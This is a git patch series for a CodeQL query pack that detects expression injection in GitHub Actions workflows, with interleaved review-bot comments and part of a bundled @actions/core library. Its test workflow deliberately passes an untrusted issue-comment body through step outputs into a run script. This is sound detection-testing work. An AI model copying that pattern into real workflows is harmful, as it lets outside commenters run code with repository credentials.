diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index f67811b3f5f..19c43ad3066 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -23,9 +23,15 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } } module MyFlow = TaintTracking::Global; From 1cd32195a7f807d4a63d25ca13946b0d4de657d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 11:51:28 +0100 Subject: [PATCH 0035/1267] feat(bash-step): Improve bash step accuracy Only pass the taint when the env var is directlty set as the step output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +++--------- .../Security/CWE-094/ExpressionInjection.ql | 3 +-- .../workflows/image_link_generator.yml | 26 +++---------------- 3 files changed, 8 insertions(+), 37 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index faa7c4c3ebe..bc0c782e9ff 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,11 +21,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -// private class RunEnvToScriptStep extends AdditionalTaintStep { -// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { -// runEnvToScriptstep(pred, succ) -// } -// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
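Review bot: The first disjunct of the new `allowImplicitRead` calls `allowImplicitRead(node, set)` from inside the predicate of the same name, which appears to resolve to this predicate itself rather than to any default. As a recursive call with no other base case it contributes no tuples, so the predicate is effectively only its second disjunct, and the line suggests an inherited behaviour that is not there. I would reduce the body to `isSink(node) and set instanceof DataFlow::FieldContent` and put a comment above it such as `// outputs are stored as field content; allow the sink to read any field implicitly`. Since an implicit read at the sink widens what counts as reaching it, a test with an untainted sibling output that must not alert would be worth adding.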
@@ -34,11 +29,9 @@ class AdditionalTaintStep extends Unit { * env: * BODY: ${{ github.event.comment.body }} * run: | - * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - * echo "Cleaned Initial URL: $INITIAL_URL" - * echo "::set-output name=initial_url::$INITIAL_URL" - * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT - * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | @@ -51,8 +44,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and - // TODO: repalce script with line below - script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r ) diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4b47a154a1d..99779d6cc90 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -37,5 +37,4 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + - " }}, which may be controlled by an external user." + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 9ebb7bbf2be..c8a30dad294 100644 
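Review bot: In the `@@ -51,8 +44,7 @@` hunk, `line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0` is a plain substring test, so an env var named `BODY` also matches a line that only uses `$BODY_LEN`, and taint is then attributed to an output that never receives it. Anchoring the end of the name would avoid that, e.g. `line.regexpMatch(".*\\$(\\{|ENV\\{)?" + varName + "\\b.*")`, assuming `varName` never holds regex metacharacters, which should be confirmed. `> 0` also skips a match at offset 0; that cannot occur for the `echo` forms handled here, but `>= 0` states the intent. The predicate starts and ends outside the hunk.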
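Review bot: The new alert text in `ExpressionInjection.ql` is identical for every result and no longer says what is being interpolated, and its wording reads as if the injection rather than the value were user-controlled. Dropping the `.(CtxAccessExpr)` cast is understandable, since the cast presumably discarded results whose sink is not a context access, but the triage context can be kept with a placeholder bound to the source: `"Potential expression injection from $@.", source.getNode(), "a value that may be controlled by an external user"`. The query metadata is outside this hunk, so whether the extra select columns fit the declared `@kind` needs checking.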
--- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -17,41 +17,21 @@ jobs: env: BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" + echo "::set-output name=initial_url::$BODY" - name: Get Redirected URL with Debugging id: curl env: INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - + echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT - name: Trim URL after PNG id: trim-url env: REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" + echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" From 499c3e7ac3f152b224268752870fa9369b151187 Mon Sep 17 00:00:00 2001 
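Review bot: After this rewrite the fixture only exercises the case where the env var is echoed straight into the output, so the shape the old steps modelled, `INITIAL_URL=$(echo "$BODY" | grep -o …)` followed by `echo "::set-output name=initial_url::$INITIAL_URL"`, is no longer tested at all. That indirect form is a common way for an untrusted comment body to reach a step output, and with the narrowed step in `FlowSteps.qll` it is presumably now a missed result. I would keep one step in that shape in a separate fixture and record the expected absence of an alert, with a comment like `# known false negative: taint through an intermediate shell variable is not tracked`, so the gap stays visible and a later improvement shows up as a test change.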
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 12:03:06 +0100 Subject: [PATCH 0036/1267] Improve regexs --- ql/lib/codeql/actions/Ast.qll | 16 +++++++++++----- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e5f9e35a4a9..b04694ed568 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -355,15 +355,21 @@ class CtxAccessExpr extends ExprAccessExpr { abstract Expression getRefExpr(); } -private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string stepsCtxRegex() { + result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string needsCtxRegex() { + result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string jobsCtxRegex() { + result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } +private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } +private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } /** * Holds for an expression accesing the `steps` context. diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2b35b2f332f..09094f2c580 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
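Review bot: `\\b` does not stop these patterns from matching a context name that is only a property of another context, because `.` and `-` are themselves word boundaries: `\\benv\\.` still matches inside `matrix.env.FOO` and `\\binputs\\.` inside `github.event.inputs.x`. If the intent is to match only a top-level context, a negative lookbehind is closer, e.g. `result = "(?<![\\w.-])env\\.([A-Za-z0-9_-]+)\\b"`, assuming the engine accepts lookbehind as Java-style regexes do. The trailing `\\b` after a character class that includes `-` also means a name ending in `-` is captured without its last character. A one-line comment above the five helpers saying what the boundaries are meant to exclude would make the intent checkable.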
@@ -137,7 +137,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { } /** - * Composite action input sources + * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionStmt c; From 0105d63a4423368d25be3249a88432b2fe233a8e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:25:23 +0100 Subject: [PATCH 0037/1267] Add Action to scan repos --- .github/action/.gitignore | 1 + .github/action/dist/index.js | 30712 +++++++++++++++++++++++++++++ .github/action/dist/licenses.txt | 175 + .github/action/package-lock.json | 639 + .github/action/package.json | 48 + .github/action/src/codeql.ts | 158 + .github/action/src/index.ts | 61 + .github/action/tsconfig.json | 24 + .github/workflows/build.yml | 30 + action.yml | 19 + ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 12 files changed, 31869 insertions(+), 2 deletions(-) create mode 100644 .github/action/.gitignore create mode 100644 .github/action/dist/index.js create mode 100644 .github/action/dist/licenses.txt create mode 100644 .github/action/package-lock.json create mode 100644 .github/action/package.json create mode 100644 .github/action/src/codeql.ts create mode 100644 .github/action/src/index.ts create mode 100644 .github/action/tsconfig.json create mode 100644 .github/workflows/build.yml create mode 100644 action.yml diff --git a/.github/action/.gitignore b/.github/action/.gitignore new file mode 100644 index 00000000000..c2658d7d1b3 --- /dev/null +++ b/.github/action/.gitignore @@ -0,0 +1 @@ +node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js new file mode 100644 index 00000000000..e13da63ecda --- /dev/null +++ b/.github/action/dist/index.js 
@@ -0,0 +1,30712 @@ +/******/ (() => { // webpackBootstrap +/******/ var __webpack_modules__ = ({ + +/***/ 7351: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.issue = exports.issueCommand = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const utils_1 = __nccwpck_require__(5278); +/** + * Commands + * + * Command Format: + * ::name key=value,key=value::message + * + * Examples: + * ::warning::This is the message + * ::set-env name=MY_VAR::some value + */ +function issueCommand(command, properties, message) { + const cmd = new Command(command, properties, message); + process.stdout.write(cmd.toString() + os.EOL); +} +exports.issueCommand = issueCommand; +function issue(name, message = '') { + issueCommand(name, {}, message); +} +exports.issue = issue; +const CMD_STRING = '::'; +class Command { + constructor(command, properties, message) { + if (!command) { + command = 'missing.command'; + } + this.command = command; + this.properties = properties; + this.message = message; + } + toString() { + let cmdStr = 
CMD_STRING + this.command; + if (this.properties && Object.keys(this.properties).length > 0) { + cmdStr += ' '; + let first = true; + for (const key in this.properties) { + if (this.properties.hasOwnProperty(key)) { + const val = this.properties[key]; + if (val) { + if (first) { + first = false; + } + else { + cmdStr += ','; + } + cmdStr += `${key}=${escapeProperty(val)}`; + } + } + } + } + cmdStr += `${CMD_STRING}${escapeData(this.message)}`; + return cmdStr; + } +} +function escapeData(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A'); +} +function escapeProperty(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A') + .replace(/:/g, '%3A') + .replace(/,/g, '%2C'); +} +//# sourceMappingURL=command.js.map + +/***/ }), + +/***/ 2186: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; +const command_1 = __nccwpck_require__(7351); +const file_command_1 = __nccwpck_require__(717); +const utils_1 = __nccwpck_require__(5278); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const oidc_utils_1 = __nccwpck_require__(8041); +/** + * The code to exit an action + */ +var ExitCode; +(function (ExitCode) { + /** + * A code indicating that the action was successful + */ + ExitCode[ExitCode["Success"] = 0] = "Success"; + /** + * A code indicating that the action was a failure + */ + ExitCode[ExitCode["Failure"] = 1] = "Failure"; +})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); +//----------------------------------------------------------------------- +// Variables +//----------------------------------------------------------------------- +/** + * Sets env variable for this action and future actions in the job + * @param name the name of the variable to set + * @param val the value of the 
variable. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function exportVariable(name, val) { + const convertedVal = utils_1.toCommandValue(val); + process.env[name] = convertedVal; + const filePath = process.env['GITHUB_ENV'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); + } + command_1.issueCommand('set-env', { name }, convertedVal); +} +exports.exportVariable = exportVariable; +/** + * Registers a secret which will get masked from logs + * @param secret value of the secret + */ +function setSecret(secret) { + command_1.issueCommand('add-mask', {}, secret); +} +exports.setSecret = setSecret; +/** + * Prepends inputPath to the PATH (for this action and future actions) + * @param inputPath + */ +function addPath(inputPath) { + const filePath = process.env['GITHUB_PATH'] || ''; + if (filePath) { + file_command_1.issueFileCommand('PATH', inputPath); + } + else { + command_1.issueCommand('add-path', {}, inputPath); + } + process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; +} +exports.addPath = addPath; +/** + * Gets the value of an input. + * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. + * Returns an empty string if the value is not defined. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string + */ +function getInput(name, options) { + const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; + if (options && options.required && !val) { + throw new Error(`Input required and not supplied: ${name}`); + } + if (options && options.trimWhitespace === false) { + return val; + } + return val.trim(); +} +exports.getInput = getInput; +/** + * Gets the values of an multiline input. Each value is also trimmed. 
+ * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string[] + * + */ +function getMultilineInput(name, options) { + const inputs = getInput(name, options) + .split('\n') + .filter(x => x !== ''); + if (options && options.trimWhitespace === false) { + return inputs; + } + return inputs.map(input => input.trim()); +} +exports.getMultilineInput = getMultilineInput; +/** + * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. + * Support boolean input list: `true | True | TRUE | false | False | FALSE` . + * The return value is also in boolean type. + * ref: https://yaml.org/spec/1.2/spec.html#id2804923 + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns boolean + */ +function getBooleanInput(name, options) { + const trueValue = ['true', 'True', 'TRUE']; + const falseValue = ['false', 'False', 'FALSE']; + const val = getInput(name, options); + if (trueValue.includes(val)) + return true; + if (falseValue.includes(val)) + return false; + throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + + `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); +} +exports.getBooleanInput = getBooleanInput; +/** + * Sets the value of an output. + * + * @param name name of the output to set + * @param value value to store. 
Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function setOutput(name, value) { + const filePath = process.env['GITHUB_OUTPUT'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); + } + process.stdout.write(os.EOL); + command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); +} +exports.setOutput = setOutput; +/** + * Enables or disables the echoing of commands into stdout for the rest of the step. + * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. + * + */ +function setCommandEcho(enabled) { + command_1.issue('echo', enabled ? 'on' : 'off'); +} +exports.setCommandEcho = setCommandEcho; +//----------------------------------------------------------------------- +// Results +//----------------------------------------------------------------------- +/** + * Sets the action status to failed. + * When the action exits it will be with an exit code of 1 + * @param message add error issue message + */ +function setFailed(message) { + process.exitCode = ExitCode.Failure; + error(message); +} +exports.setFailed = setFailed; +//----------------------------------------------------------------------- +// Logging Commands +//----------------------------------------------------------------------- +/** + * Gets whether Actions Step Debug is on or not + */ +function isDebug() { + return process.env['RUNNER_DEBUG'] === '1'; +} +exports.isDebug = isDebug; +/** + * Writes debug message to user log + * @param message debug message + */ +function debug(message) { + command_1.issueCommand('debug', {}, message); +} +exports.debug = debug; +/** + * Adds an error issue + * @param message error issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. 
+ */ +function error(message, properties = {}) { + command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.error = error; +/** + * Adds a warning issue + * @param message warning issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function warning(message, properties = {}) { + command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.warning = warning; +/** + * Adds a notice issue + * @param message notice issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function notice(message, properties = {}) { + command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.notice = notice; +/** + * Writes info to log with console.log. + * @param message info message + */ +function info(message) { + process.stdout.write(message + os.EOL); +} +exports.info = info; +/** + * Begin an output group. + * + * Output until the next `groupEnd` will be foldable in this group + * + * @param name The name of the output group + */ +function startGroup(name) { + command_1.issue('group', name); +} +exports.startGroup = startGroup; +/** + * End an output group. + */ +function endGroup() { + command_1.issue('endgroup'); +} +exports.endGroup = endGroup; +/** + * Wrap an asynchronous function call in a group. + * + * Returns the same type as the function itself. 
+ * + * @param name The name of the group + * @param fn The function to wrap in the group + */ +function group(name, fn) { + return __awaiter(this, void 0, void 0, function* () { + startGroup(name); + let result; + try { + result = yield fn(); + } + finally { + endGroup(); + } + return result; + }); +} +exports.group = group; +//----------------------------------------------------------------------- +// Wrapper action state +//----------------------------------------------------------------------- +/** + * Saves state for current action, the state can only be retrieved by this action's post job execution. + * + * @param name name of the state to store + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function saveState(name, value) { + const filePath = process.env['GITHUB_STATE'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); + } + command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); +} +exports.saveState = saveState; +/** + * Gets the value of an state set by this action's main execution. 
+ * + * @param name name of the state to get + * @returns string + */ +function getState(name) { + return process.env[`STATE_${name}`] || ''; +} +exports.getState = getState; +function getIDToken(aud) { + return __awaiter(this, void 0, void 0, function* () { + return yield oidc_utils_1.OidcClient.getIDToken(aud); + }); +} +exports.getIDToken = getIDToken; +/** + * Summary exports + */ +var summary_1 = __nccwpck_require__(1327); +Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); +/** + * @deprecated use core.summary + */ +var summary_2 = __nccwpck_require__(1327); +Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); +/** + * Path exports + */ +var path_utils_1 = __nccwpck_require__(2981); +Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); +Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); +Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); +//# sourceMappingURL=core.js.map + +/***/ }), + +/***/ 717: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +// For internal use, subject to change. +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +const fs = __importStar(__nccwpck_require__(7147)); +const os = __importStar(__nccwpck_require__(2037)); +const uuid_1 = __nccwpck_require__(5840); +const utils_1 = __nccwpck_require__(5278); +function issueFileCommand(command, message) { + const filePath = process.env[`GITHUB_${command}`]; + if (!filePath) { + throw new Error(`Unable to find environment variable for file command ${command}`); + } + if (!fs.existsSync(filePath)) { + throw new Error(`Missing file at path: ${filePath}`); + } + fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { + encoding: 'utf8' + }); +} +exports.issueFileCommand = issueFileCommand; +function prepareKeyValueMessage(key, value) { + const delimiter = `ghadelimiter_${uuid_1.v4()}`; + const convertedValue = utils_1.toCommandValue(value); + // These should realistically never happen, but just in case someone finds a + // way to exploit uuid generation let's not allow keys or values that contain + // the delimiter. 
+ if (key.includes(delimiter)) { + throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); + } + if (convertedValue.includes(delimiter)) { + throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); + } + return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; +} +exports.prepareKeyValueMessage = prepareKeyValueMessage; +//# sourceMappingURL=file-command.js.map + +/***/ }), + +/***/ 8041: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.OidcClient = void 0; +const http_client_1 = __nccwpck_require__(6255); +const auth_1 = __nccwpck_require__(5526); +const core_1 = __nccwpck_require__(2186); +class OidcClient { + static createHttpClient(allowRetry = true, maxRetry = 10) { + const requestOptions = { + allowRetries: allowRetry, + maxRetries: maxRetry + }; + return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); + } + static getRequestToken() { + const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; + if (!token) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); + } + return token; + } + static getIDTokenUrl() { + const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; + if (!runtimeUrl) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); + } + return runtimeUrl; + } + static getCall(id_token_url) { + var _a; + return __awaiter(this, void 0, void 0, function* () { + const httpclient = OidcClient.createHttpClient(); + const res = yield httpclient + .getJson(id_token_url) + .catch(error => { + throw new Error(`Failed to get ID Token. \n + Error Code : ${error.statusCode}\n + Error Message: ${error.message}`); + }); + const id_token = (_a = res.result) === null || _a === void 0 ? 
void 0 : _a.value; + if (!id_token) { + throw new Error('Response json body do not have ID Token field'); + } + return id_token; + }); + } + static getIDToken(audience) { + return __awaiter(this, void 0, void 0, function* () { + try { + // New ID Token is requested from action service + let id_token_url = OidcClient.getIDTokenUrl(); + if (audience) { + const encodedAudience = encodeURIComponent(audience); + id_token_url = `${id_token_url}&audience=${encodedAudience}`; + } + core_1.debug(`ID token url is ${id_token_url}`); + const id_token = yield OidcClient.getCall(id_token_url); + core_1.setSecret(id_token); + return id_token; + } + catch (error) { + throw new Error(`Error message: ${error.message}`); + } + }); + } +} +exports.OidcClient = OidcClient; +//# sourceMappingURL=oidc-utils.js.map + +/***/ }), + +/***/ 2981: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
